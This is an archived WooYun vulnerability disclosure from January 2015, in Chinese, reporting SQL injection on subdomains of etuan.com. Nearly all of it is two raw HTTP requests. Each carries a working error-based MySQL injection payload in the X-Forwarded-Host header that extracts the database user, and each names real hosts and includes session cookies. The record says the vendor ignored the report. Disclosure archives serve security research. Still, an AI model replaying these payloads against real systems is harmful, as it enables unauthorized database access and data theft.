乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-09: 细节已通知厂商并且等待厂商处理中 2015-01-14: 厂商已经主动忽略漏洞,细节向公众公开
一团网分站SQL注入,打包
GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36X-Forwarded-Host: 'and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'Cookie: PHPSESSID=6d36d1b6e59e835bdea51acdb42072f5; 28BB_goodsnum=0; 28BB_tm_visit_product=1; 28BB_viewed_goods=ozJEfM84uHcI9SNIwEqUcBlBr01mzzFzawv6UtIucqFDIa_ESux1Hd_FEeowOSz124cqGYHqSUXW0S4dDwXpUHcgEqZvDWKcz5BZI84uHsI9SNKwEqUcBBEr0eEyhXb-v1WtcecwlLyawcZugFZbC0GqEVfHost: laoxuehost.etuan.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*Content-Length: 4
GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36X-Forwarded-Host: 'and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'Cookie: PHPSESSID=a98accd84226396945c559d0d4d5bb36; 28BB_goodsnum=0; 28BB_tm_visit_product=1; 28BB_viewed_goods=ZCiy8irUIP92Wgj3Qc31NSzu7NYkmDhYj6g_1JuIo5IRH58-NcGPGuGOnVLeCoXzqx9hJo40TnIh_yzdZmJd52c1inNj3cNie15OKeHeF2UAj0Qx75PyTj7NIlIAfct5QPc7xk8HCs09OhpCfyuM-OZK-GiDjv3; 28BB_tm_login=1Host: yunlifang.etuan.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*Content-Length: 6
危害等级:无影响厂商忽略
忽略时间:2015-01-14 21:58
暂无